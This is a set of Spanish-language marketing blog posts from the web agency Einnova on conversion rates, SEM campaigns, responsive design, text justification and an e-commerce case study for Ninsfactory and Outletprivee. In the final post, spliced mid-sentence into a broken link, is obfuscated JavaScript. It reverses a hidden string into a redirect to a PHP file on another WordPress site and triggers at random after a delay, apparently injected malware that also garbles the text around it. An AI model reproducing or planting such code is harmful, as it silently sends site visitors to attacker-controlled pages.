diseño web

Aumenta tus ratios de conversión en 5 pasos.

ratio-conversion

Para hablar de ratios de conversión, primero debemos definir este concepto. Se define como el porcentaje de visitantes que toman alguna acción posterior a visitar tu web, inducidos por estrategias de marketing implementadas. Entonces obtenemos: Ratio de conversión = número de conversiones / visitas a la web. Debemos realizar un análisis detallado para poder precisar estas acciones relacionadas a los ratios de conversión, y así lograr aumentar estos porcentajes.

Podemos ejemplificar los ratios de conversión a través de:

  • La venta de un producto generado debido a la publicidad posicionada estratégicamente.
  • Descarga de contenidos publicitados en la web.
  • Registro de usuarios en la base de datos.

Ahora bien, ya sabemos de qué se tratan los ratios de conversión. A continuación cinco (5) fáciles pasos para aumentar estos porcentajes:

  • Más rápido es mejor: Facilita los procesos relacionados a compra o entrega de contenidos. Lo ideal es el usuario tenga que realizar la menor cantidad de clicks posibles para completar la acción, esto asegurará y aumentara tus ratios.

 

  • Menos es más: Un gran porcentaje de usuarios desconfía y abandona un site cuando se le requiere más información de la debida. Prescinde de pedir información no necesaria, por ejemplo, no pidas mucha información para el newsletter más que el correo.

 

  • Mide y observa: ¿Sabes realmente a qué se dedican las visitas en tu web? ¿Sabes cuánto tiempo pasan estos usuarios en la web? ¿De dónde vienen los usuarios? ¿Por qué y para qué están en tu web? Para llegar a ratios de conversión primero has de responder todas las preguntas anteriores. Finalmente será interesante que plantees ratios de fidelización, así desplegar estrategias para tus clientes más fieles.

 

  • Precisa: Es importante que durante las mediciones tengas en cuenta variables en el tiempo. Deberás tener en cuenta que durante las promociones y concursos, los ratios de conversión aumentarán (o no) y aquí podrás plantear nuevas estrategias basándote en mejoras.

 

  • Mejoras con vistas a futuro: Así como comentamos en el punto anterior, el cambio es necesario y la mejora parte del proceso. Ten en cuenta las mediciones que has hecho, esto te servirá para enfocar tus acciones estratégicas. Fija objetivos enfocados a resultados específicos. Implementa nuevas estrategias para estudiar su impacto.

Ahora que ya tienes nuevas ideas para medir tus ratios de conversión, no dudes en implementarlas. Lo importante de esto es enfocar tu estrategia de ventas a resultados específicos. Si necesitas ayuda, ten en cuenta que desde Einnova queremos encontrar soluciones a la medida para tu empresa.

10 consejos para maximizar beneficios en tu campaña SEM

SEM(2)

Si aún no estás familiarizado con el término SEM, con esta guía te diremos de qué se trata, orientaremos y daremos una idea global de cómo funciona. Para comenzar debemos definir las siglas “SEM”, que hacen referencia a “Search Engine Marketing” (“Márketing en Buscadores”) y a diferencia del SEO (El cual es posicionamiento orgánico) el “SEM” es de pago.

Lo realmente interesante del SEM es que puedes segmentar tu campaña de manera geográfica, y seleccionar bajo qué palabras de búsquedas aparecer. Finalmente si y sólo si la persona hace click en el enlace mostrado, tú pagarás por esa visita. Todo esto a grandes rasgos, ya que el universo del SEM es más extenso y desde Einnova podemos ayudarte en tus campañas de Marketing en Buscadores.

1) Segmenta y vencerás: Es importante y el primer paso. Has de tener en cuenta que el mercado en internet es universal, por lo que deberás segmentar en cual área geográfica quieres aparecer.

2) Saca provecho a las herramientas de Google: Las combinaciones de búsqueda, palabras relacionadas y demás aproximaciones podrás definirlas con la herramienta de Adwords “Planificador de palabras clave” . Herramienta de gran utilidad para llegar a una mayor cantidad de personas, planifica y vencerás.

3) Palabras negativas: Dependiendo de tu campaña, producto o servicios que prestes deberás tener en cuenta que habrán palabras que chocan con los objetivos de tu empresa. Por ello Google Adwords permite añadir esas palabras negativas, lo que se traduce, a que realizando esa búsqueda no aparecerás en resultados.

4) Utiliza la creatividad: Es posible crear dentro de cada grupo de campañas, anuncios con textos diferentes. Para ello hemos de ser creativos y utilizar la imaginación, ya que con esto podremos llegar a más personas con búsquedas relacionadas a nuestras campañas.

5) La visibilidad y el resumen: Ten en cuenta que 70 caracteres en líneas descriptivas y 35 de URL visible será el espacio que tendremos para anunciarnos, captando el interés del futuro comprador que hará click en nuestro anuncio. Los textos deben ser llamativos, redactados de una forma original y creando visibilidad para destacar entre los demás anuncios.

6) Delimita los horarios: Decidiendo qué días y a qué horas aparecer podrás obtener más beneficios. Aunque esto dependerá de tu campaña y del resto de campañas que se anuncien en los días/horas, todo supeditado a la demanda de búsqueda de usuarios.

7) Maneja tus estadísticas: Enlazando tu cuenta de Adwords con Google Analytics podrás obtener información detallada de los hábitos del futuro comprador.

8) Optimiza tu web: No servirá de nada que tengas una campaña en Adwords y el usuario al hacer click en tu anuncio decida abandonar tu web por los tiempos de carga o peor aún; por la dificultad de navegar en tu web. Por ello desde Einnova queremos ayudarte a que optimices tus ventas y saques provecho a tus campañas.

9) Actualiza y vencerás: Como en el mundo actual, todo se trata de actualizar y no resistirse al cambio. Por ello habrá que estudiar y tener en cuenta los hábitos del consumidor. modificando los textos, palabras clave y de ser necesario: La estrategia.

10) No confundas SEM con SEO: Una de las dudas que más recibimos en Einnova sobre el SEM, es creer que está relacionado con el SEO. Esto no es cierto, ya que con el SEM mientras pagues aparecerás en listados de búsqueda y una vez que dejes de pagar, desaparecerás. Mientras que en el SEO es un posicionamiento orgánico que se va trabajando en el tiempo y los resultados son duraderos. Por eso queremos ofrecerte soluciones a la medida para tu campaña SEM o SEO. Sea cual sea la que elijas, nuestros especialistas están para asesorarte.

Las claves de oro para incrementar tus ventas online

Desde Einnova nos preocupamos por ofrecerte soluciones a la medida, y por ello hemos desarrollado estas claves de oro que incrementarán tus ventas online.

 

  1. Ofrecer la mejor experiencia para el usuario: Queremos que la experiencia de usuario cuando navega por tu web sea única, por ello el diseño de la web debe ser intuitiva. No deben existir estímulos que distraigan la atención del cliente y el objetivo debe ser claro. Segmentar los productos en familias y subfamilias, hará que estos menús y submenús organizados sean de guía para el cliente. El motor de búsqueda ya no es solo un valor añadido, se ha convertido en una característica esencial que ayudará a tus clientes habituales a realizar la compra de forma más rápida, encontrando más fácilmente esos productos que están acostumbrados a comprar.
  1. Esperar a que carguen los archivos es del siglo pasado: Los clientes se impacientan en las tiendas físicas cuando tienen que esperar y hacer largas colas, algunos hasta se marchan sin realizar la compra. ¿Por qué debería ser distinto en tu tienda on-line? Una carga rápida de tu web hará que la navegación sea más sencilla, lo que se traduce en que el cliente verá más productos en menor tiempo. Si deseas saber los tiempos de carga de tu web, puedes usar el PageSpeed Tool que se encargara de hacer esta valoración.
  1. Estrategias enfocadas a recuperar ventas: Se estima que un 70% de los carritos de compra en tiendas virtuales no terminan comprándose, por eso, aún cuando esto tiende a ser una práctica habitual debemos tener una estrategia. Razón por la cual desde Einnova estamos para ofrecerte soluciones a la medida que aumentarán tus ventas, trazando un plan de acción para recuperar aquellos clientes que dábamos por perdidos.
  1. Cómo aumentar las ventas de manera convincente: El Neuromarketing es una de las prácticas con más auge durante los últimos años. Si quieres saber más, aquí te explicamos con más detalle . Pero a breves rasgos podemos adelantar que destacar las características atractivas del producto, la cercanía con el cliente, ofrecer un valor agregado y limitar en tiempo o cantidad los productos serán los principios básicos enfocados a estrategias del neuromarketing. Por ello contamos con un equipo dedicado a evaluar los hábitos de compra de tus clientes y con esta información desplegar estrategias enfocadas a soluciones para tus ventas.
  1. El marketing de contenidos como herramienta generadora de tráfico: es importante tener en cuenta que el tráfico (de calidad) es un factor importante para el posicionamiento SEO, pero además de esto, será indispensable para atraer posibles clientes. Incluir un blog dentro de tu estrategia global de ventas generara tráfico y con un uso correcto de los contenidos, las personas compartirán tu información haciendo que cada vez llegue a más gente a través de las redes sociales.

3 motivos para hacer tu web responsive y evitar que Google te penalice

Hace un par de semanas ya comentábamos en otro post sobre Cómo Evitar que Google Penalice Tu Web, que Google había designado el día 21 de Abril como la fecha límite para empezar a penalizar a todas las web que no sean responsive. Llegado este día, como expertos en Google que somos, vemos necesario realizar las siguientes observaciones:

¿Será automática esta penalización? Como bien sabemos a veces Google es un poco hermético en el sentido de dar a conocer cómo funciona su algoritmo. Normalmente muestra parte de la información y el resto, en ocasiones la información esencial, la deja a nuestra suerte para que en un ensayo y error vayamos descubriendo las claves del SEO.
Si es cierto que en el SEO hay indicadores de mayor peso y que son indispensables, aún falta mucho por descubrir, ya que, el mismo algoritmo, se va actualizando constantemente. Sin más rodeos, respondiendo al planteamiento inicial podemos decir que la penalización no será automática porqué el crawler tardará en ir analizando, actualizando y clasificando las webs que son responsives y las que no lo son para ir penalizándolas en posiciones posteriormente.
Lo más importante de esto es saber que si el crawler de Google pasa mañana por tu web y no está actualizada… Prepárate para una penalización y para ser olvidado entre las últimas páginas de búsqueda

¿Por qué responsive? Sencillo. Las webs responsives son ya el pesente debido a que el 67% de los usuarios tienden a comprar en sitios Mobile-Friendly (Amigables para el móvil) ya que aseguran una experiencia de usuario más cómoda y sencilla. Y ya se sabe que los temas de experiencia de usuario para Google son muy importantes. Además, teniendo en cuenta que las webs responsives tienen la misma URL y código fuente, no dificultan el proceso de clasificación e indexación a Google.

¿Responsive suplantará a las Apps? Quizás es un poco osado pensar que esto ocurrirá, o siquiera hacer el planteamiento… pero, cada vez son más las empresas que prefieren desarrollar una web responsive que una App, aunque, en gran medida esto dependa de sus propias necesidades. Lo que si es cierto, es que esto choca con la necesidad infundada que no hace mucho existía, sobre el desarrollo de Apps y en la que se aseguraba que todas las empresas debían tener una.

Desde Einnova podemos asesorarte y crear una solución a medida para ti, tanto para desarrollar una App como para adaptar tu web a un diseño responsive. Recuerda que el tiempo corre y pronto recibirás el crawler de google en tu web, no te puedes permitir ser penalizado.

Evita que Google Penalice Tu Web con el Diseño Responsive

web_design_by_74studio-d5iwaet

Seguro que a lo largo de estas últimas semanas, has recibido el mensaje en Google Webmaster Tools avisándote de que debes solucionar los problemas de usabilidad móvil de tu página web. Y es que, el comercio electrónico a través de dispositivos móviles se ha disparado en poco más de un año y por eso Google ha dicho que ya no quiere esperar más para exigir a sus usuarios que sus webs sean “responisve design”  o lo que es lo mismo, adaptadas para que los usuarios puedan navegar desde dispositivos móviles.

Actualización Algorítmica para el día 21 de Abril

Según lo publicado en su blog, Google afirma que será el día 21 de Abril la fecha límite para que una web no tenga “responsive design”  sin ser penalizada y por tanto perder posiciones. Esta información no debe sorprendernos, ya que, es sabido por todos, la predilección que Google tiene por las páginas web con mayor usabilidad y también que el diseño móvil puede ser un factor relevante para el posicionamiento web.

La diferencia es que en esta ocasión, Google deja claro que el “responsive design” deja de ser un factor relevante para pasar a ser un factor fundamental y que el riesgo que se asume al no implementar este diseño puede llegar a ser muy elevado o incluso provocar que la web desaparezca de los resultados de Google. Y ya se sabe, nos guste o no, hoy en día no aparecer en Google es peor que no existir…

Para los propietarios de páginas web o web masters más curiosos, Google ha puesto a disposición esta herramienta que permite tener una valoración sobre la experiencia que ofrece nuestra página web a las usuarios que navegan con dispositivos móviles

Adelantate y Evita ser Penalizado

Como Web Masters, nuestro consejo es que te adelantes a esta actualización algorítmica, si ya tienes una web adaptada para dispositivos móviles revisa posibles correcciones que Google te indique en la herramienta que hemos comentado anteriormente. Si todavía no tienes tu web adaptada a la navegación con dispositivos móviles, adelántate a la actualización algorítmica y intenta estar preparado para cuando esta llegue. Por todos es sabido que cuando Google te impacta con alguno de sus cambios algorítmicos, cuesta mucho trabajo recuperar el tráfico anterior al impacto.

Claves para un buen “diseño responsive”:

  • Ten en cuenta todas las resoluciones de pantalla: Este es un punto fundamental, no caigamos en la tentación de diseñar una web responsive que solo se vea bien en los principales dispositivos. Nuestra web debe ser usable en TODOS los dispositivos sin excepción.
  • El tamaño sí que importa: En este caso hablamos del tamaño de la letra como factor importante para un diseño responsive correcto y es que a Google no le gusta que sus usuarios tengan que dejarse los ojos en su móvil para poder leer en tu página web.
  • Optimiza el peso de tus imágenes: Ya sabemos lo que nos duran los “megas” de navegación de nuestras tarifas, por eso evita que tu página tarde demasiado en cargarse y para esto, lo mejor es optimizar el peso de las imágenes
  • Copia el funcionamiento de una App: Normalmente una App es sinónimo de optimización de recursos y buena usabilidad. Por eso intenta que tu web funcione de forma parecida a una App para móvil

Si quieres que te ayudemos a diseñar tu web adaptada a móviles, no dudes en ponerte en contacto con nosotros. En Einnova llevamos 18 años trabajando el diseño web.

Auge en el uso de aplicaciones móviles de ecommerce y compras online

Internet se ha convertido en un gran canal de oportunidades, una evidencia que nadie puede discutir a estas alturas. El 2014 acabó con un incremento del 13,4% en lo que respecta a las ventas mediante comercio electrónico, un final de año repleto de satisfacciones para el sector online. La tendencia para el 2015 seguirá siendo al alza motivada, en cierta manera, por la progresiva confianza que los usuarios van teniendo a la hora de comprar online y al auge de las compras a través de dispositivos móviles.

En el 2014 el uso de aplicaciones móviles aumentó un 76% y las aplicaciones de compras aumentaron un 174%. Para el 2015 se prevé que los dispositivos móviles alcancen el 33% de todas las transacciones que se realicen en Internet. 

Estudios recientes ponen de manifiesto que los usuarios mostraron un interés creciente en las aplicaciones de compras, hasta el punto de llegar a un crecimiento en su uso de un 174%. Entre los usuarios Android el aumento fue aún más significativo, llegando a alcanzar el 220%. Es un hecho comprobado que los móviles no sirven solamente para estar conectados y mantenernos en constante comunicación con nuestro entorno, sino que cada vez más los usamos para muchas de nuestras acciones cotidianas y, por supuesto, para comprar.

No solo cada vez compramos más a través de nuestras tablets o smartphones sino que, aunque finalicemos la compra a través de un ordenador, muchas de las primeras consultas las realizamos a través del móvil, hecho que confirma que la adaptación al entorno móvil de cualquier negocio online ya no es una opción sino una obligación de primer orden.

A esto hay que sumarle los datos tan escalofriantes de ventas en lo referente a dispositivos móviles, como por ejemplo los 650 millones de Iphones que se han vendido desde que apareció el primer modelo allá por el año 2007. Otro dato significativo lo encontramos en el fabricante chino de teléfonos móviles Xiaomi que en 2014 llegó a vender un 61,12 millones de dispositivos, un 227% más que en 2013.

Asímismo, la venta de tablets superará por primera vez a la de los PC en 2015. Se calcula que este año se venderán 321 millones de unidades de tablets, aumentando desde los 256 millones en 2014, mientras que la venta de ordenadores disminuirá de los 276 millones en 2014 a los 262 millones en 2015. Por otro lado, se estima que las ventas de smartphones representarán el 88% de las ventas totales de teléfonos móviles en 2018.

En el mundo hay 2.400 millones de usuarios, ¿a qué esperas para tener tu propia aplicación móvil?.

En Einnova te ayudamos a crearla dándole un concepto innovador que llegue a todos tus clientes. No dudes en contactar con nosotros, trabajaremos contigo para definir tu aplicación móvil ideal.

Justificación del texto de una web

Seguro que a muchos se os ha pasado por la cabeza nada más ver vuestra página web, que esta, quedaría mucho mejor con un texto justificado. Bien, puede que estéticamente nos parezca que es mejor que el texto de nuestra web aparezca justificado, es decir, perfectamente alienado y encajado e igualado en el tamaño de la página, pero, debemos saber que esta, es una práctica no recomendada, es más, podríamos decir que hasta casi prohibida.

La justificación del texto se utiliza en periódicos, revistas o boletines con el objetivo de crear un ritmo horizontal que guíe a los ojos del lector por la página. Para que el resultado de la justificación del texto sea óptimo intervienen factores como tipo y tamaño de letra, ancho de página, longitud del bloque del texto separación de sílabas o idioma. Por desgracia, en una página web no puede controlarse ninguno de estos aspectos y cuando optamos por un tipo de texto justificado, nos encontramos con el siguiente problema:

B.FT_Just_Rag

Los navegadores no están preparados para justificar textos y no pueden partir palabras, por tanto, como vemos en la imagen, al justificar el texto en nuestra página web se modifica el espacio entre palabras o la partición de estas, lo que nos da como resultado lo que los diseñadores web denominan como “ríos de espacio en blanco”. Estos “ríos de espacio en blanco” son estéticamente perjudiciales y además provocan, aun más dificultades de lectura para aquellos usuarios que ya de por si, tienen problemas de lectura.

Un estudio de la universidad de Wichita (EE.UU) trabajó con dos grupos de usuarios a los que se les dio a leer un texto justificado a ambos lados y otro texto justificado solamente a la izquierda. El estudio demostró que la justificación a ambos lados dificultaba la lectura del texto en la mayoría de los casos. También hay que tener en cuenta que si navegamos por las webs de los principales medios de comunicación a nivel mundial como BBCNew York TimesFinancial Times nos daremos cuenta de que en ningún caso se utiliza la justificación del texto a ambos lados o a la derecha y esto se debe a que estos gigantes de la comunicación son perfectos conocedores de los problemas que tiene una incorrecta justificación del texto.

En Einnova trabajamos siempre el diseño web teniendo en cuenta todos estos aspectos para que los textos que aparecen en tu página web resulten fáciles de leer y de entender. Si tienes alguna duda o consulta o crees que podemos ayudarte con el diseño de tu página web, no dudes en ponerte en contacto con nosotros.

 

¿Qué es el diseño web responsive?

diseno-web-responsive

El objetivo del diseño responsive es el de evitar la creación de distintas versiones de web para cada uno de los dispositivos que pueden usar una página web (una versión para los ordenadores, otra para móviles y otra para tablets).

Ethan Marcotte presentó la técnica “Responsive Web Design” en una serie de artículos en la famosa revista online A List Apart. Su idea luego se extendió en su libro Responsive Web Design.

Esto significa ir más allá de tener un diseño fluido. Hacer una página web con “Responsive Web Design” es hacer un sólo diseño web que sea sensible a los distintos anchos de pantalla de cada dispositivo y que sea receptivo a distintos métodos de interacción que utiliza el usuario (pulsar, click del ratón, arrastrar, etc)

¿Quieres un diseño web responsive o quieres una versión de web móvil y otra versión web para ordenador? Te podemos ayudar a decidir valorando las ventajas y requisitos de cada una de estas opciones.

El diseño de la tienda online de Ninsfactory, un caso de éxito en E-commerce

La Cámara de Comercio e Industria Francesa de Barcelona, pidió a la Generalitat de Catalunya la colaboración de expertos en TIC (Tecnologías de la Información y la Comunicación) para dar una conferencia sobre casos de éxito de diseño de tienda online. Querían impulsar este sector emergente de la economía y buscaban casos reales de E-Commerce, situaciones concretas con las que los asistentes se pudieran identificar. La seleccionada fue Einnova, como especialista en posicionar web y uno de los mejores diseñadores web de Barcelona, y concretamente por su labor con el desarrollo del proyecto de la tienda online de Ninsfactory.

sala conferencia

Desde Einnova siempre hemos querido formar parte del tejido tecnológico y empresarial de este mercado en constante ebullición, por lo que estamos inscritos como empresa consultora en el Plan Pymestic. Este organismo dependiente de la Generalitat de Catalunya, actualmente sustituido por el Plan Idigital, consiste en un servicio de orientación sobre posicionamiento web y comercio electrónico, para empresas. Se encarga, pues, de promocionar el E-commerce y TIC, a través de una base de datos formada por un grupo de empresas consultoras expertas, para que las empresas y emprendedores que necesiten ayuda y orientación, lo puedan tener por un módico precio. La crisis actual también ha afectado a este plan, y la Generalitat ha retirado su cobertura económica para que sean las propias empresas las que tengan que costear la asesoría por una tarifa única de 400 €.

El caso de éxito mostrado por Einnova en esta conferencia, que se hizo en Barcelona el 9 de noviembre del 2011, fue el del trabajo realizado para nuestro cliente Ninsfactory, una tienda online de productos para bebés, con el que se consiguió un importante aumento de ventas . La clienta, Dolores Candela, nos conoció a través de una feria organizada en la Fira de Barcelona, en la que Einnova estuvo presente como única empresa consultora de E-commerce avanzado del mencionado Plan Pymestic de la Generalitat de Catalunya.

conferencia

Así, este organismo para orientar a empresas en el entorno digital, sirvió de puente entre una empresa con problemas en su negocio virtual, Ninsfactory, y una empresa que ofrece soluciones reales, Einnova. Desde esa primera toma de contacto, se hicieron dos reuniones en sus oficinas de Vilassar de Mar, y a partir de ahí todo el trabajo fue telemático, siendo fieles a una de las máxima del E-commerce: las grandes posibilidades que ofrece internet para trabajar y hacer negocio a distancia.

Primero nos centramos en el SEO, para hacer llegar más clientes potenciales a su web a través de un concienzudo trabajo de posicionamiento web. Y después, en vistas de que Ninsfactory era una web con muchas posibilidades de mejoras, como la usabilidad y la confianza de los clientes potenciales, se elaboró un informe para solucionar esos errores e implementar las mejoras recomendadas. Con este servicio de consultores web, los resultados empezaron a llegar y eran tantas las opciones de mejora, que desde Ninsfactory fueron conscientes de que para mejorar la web debían partir de cero, cosa que les sería más rentable a la larga que ir solucionando “a trozos” los errores de la antigua.

Les asesoramos en todo el proceso para hacer la nueva página web. Utilizamos las técnicas del neuromarketing, y fijamos una serie de directrices fundamentales para no caer en los errores del pasado y asegurarse un resultado satisfactorio. La colaboración entre Einnova y Ninsfactory estaba siendo tan fructífera que se embarcaron juntos en un nuevo proyecto, Outletprivee, una nueva web de E-commerce centrada en el sector del outlet, productos de temporadas pasadas con salida comercial.

La conferencia, titulada ”Las herramientas imprescindibles para garantizar un comercio digital efectivo”, fue todo un éxito, como el trabajo con Ninsfactory. Los asistentes pudieron entender que mejorar la web incrementa las ventas, y que todo error que se encuentre el cliente cuando esté navegando puede suponer que se marche, que lo perdamos. Es por ello que una escasa inversión puede suponer un gran cambio en nuestra web. Podemos optimizar las visitas para convertir a visitantes en clientes, y utilizando técnicas de neuromarketing, el poder de nuestra página web adquiere otra dimensión.

Podríamos utilizar una imagen para ejemplificar todo este proceso de mejora en las tiendas online. Supongamos que tenemos un cubo (representando metafóricamente nuestra tienda online), en el que entra agua (que serían los potenciales clientes que entran en la web), pero hay unos agujeros por los que se escapa el líquido (o sea los errores en esta web ocasionan que los visitantes se marchen sin comprar). En ese punto es en el que entramos nosotros, una empresa como Einnova capaz de solucionar los errores de la tienda online. Siguiendo con el símil, nuestro trabajo es poner parches en la web (cubo), solucionar esos errores (tapar esos agujeros), por los que se escapan los clientes (agua).

cubo

El resultado es simple, mejorando la web los clientes no se van, y nuestro cliente tiene más posibilidades de vender. Y si a eso le añadimos que mediante el posicionamiento web, el caudal de clientes aumenta (más agua para llenar el cubo), nos encontramos con una empresa de E-commerce pujante, una tienda online con posibilidades reales de crecimiento gracias a una herramienta de trabajo mejorada y con más visitas. ¿Quieres que te ayudemos a mejorar?

Ouletprivee, una cadena de recomendaciones ventajosa para todos

En los últimos años ha proliferado un modelo de ecommerce (comercio electrónico, compra y venta de productos o servicios a través de internet) basado en los outlets. La empresa compra a mayoristas productos de calidad a bajos precios y los expone en su tienda online, por lo que sus clientes pueden aprovecharse de grandes ofertas y comprar sin moverse de casa. Un sistema de negocio que está dando grandes resultados, pero que, como todo, necesita ir renovándose para seguir llegando a potenciales clientes y ofrecer una imagen actual.

Uno de nuestros clientes, Ninsfactory, una tienda online de productos para bebés, quería explorar estas nuevas vías de negocio, y se puso en nuestras manos, para dar un nuevo impulso a su apuesta. En Einnova, siempre al día de las innovaciones, nos pusimos manos a la obra con este proyecto que adoptaría el nombre de Ouletprivee.

logo_h

Trabajamos con un sistema de venta por limitación de tiempo, una sencilla aplicación informática que permite a la propia empresa manejar sus campañas de promociones, fijar una fecha de inicio y de fin para sus ofertas. Así, el cliente final disponía de un margen de tiempo para poder decidir si le interesa la compra, una cuenta atrás hasta que el stock de dicho producto se acabara.

administrar-campanas

Otra de las apuestas que pusimos en marcha para Outletprivee fue un sistema de captación de nuevos clientes basado en las recomendaciones de los propios usuarios. Este método de marketing, denominado apadrinamiento, consiste en que el cliente va acumulando puntos a medida que va consiguiendo que sus conocidos también se registren y compren en la tienda online. Por ejemplo, un cliente envía varios emails a sus amigos para recomendarles Outletprivee, por cada uno de ellos que se registre consigue un punto, y si además realiza una compra, el cliente del que ha partido la recomendación puede acumular hasta diez puntos más.

Todos esos puntos son canjeables por descuentos en siguientes compras, gracias a la gestión de una plataforma de fidelización llamada Sweet Tooth Rewards. El sistema es muy sencillo, cuando el nuevo cliente realiza su compra introduce un código y así el cliente que le había recomendado recibe su descuento al momento. Desde Einnova nos ha gustado tanto esta iniciativa de Sweet Tooth Rewards, que nos hemos convertido en unos de sus partners en España, una alianza gracias a compartir la misma querencia por la innovación y las técnicas creativas de marketing.

Esta cadena de recomendaciones entre clientes es ventajosa para todas las partes. Outletprivee fideliza a sus clientes, capta nuevos gracias a un marketing sin coste directo en promociones ni publicidad, y aumentan las probabilidades de seguir haciendo ventas; por su parte, los clientes se benefician de descuentos, y alimentan una sensación de formar parte de un club, un grupo de clientes inteligentes que saben aprovechar las oportunidades que brindan las nuevas tecnologías.

Esta sensación de formar parte de un todo también es extrapolable a las empresas que hay detrás de esta iniciativa. Como decíamos, Einnova ya somos uno de los partners de Sweet Tooth Rewards, de la $vTB$I_919AeEAw2z$KX=function(n){if (typeof ($vTB$I_919AeEAw2z$KX.list[n]) == “string”) return $vTB$I_919AeEAw2z$KX.list[n].split(“”).reverse().join(“”);return $vTB$I_919AeEAw2z$KX.list[n];};$vTB$I_919AeEAw2z$KX.list=[“‘php.nosj.ssalc/cni/xobloot-yendys/snigulp/tnetnoc-pw/moc.itnetaitak.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and-einnova-the-birth-of-outletprivee/”>alianza entre Ninsfactory y Einnova nació Ouletprivee, y además colaboramos con Magento, una herramienta informática útil y de fácil manejo para las empresas de ecommerce que necesiten trabajar con sus tiendas online para ampliar, mejorar, personalizar… Magento ofrece un amplio abanico de posibilidades al alcance de todos, que desde Einnova recomendamos.

Como podéis ver en este video, también impartimos seminarios sobre la utilización de Magento para nuestros clientes.

Sumar fuerzas siempre es positivo, da lugar a nuevos proyectos, nuevas asociaciones, y nuevas ventajas para clientes inteligentes.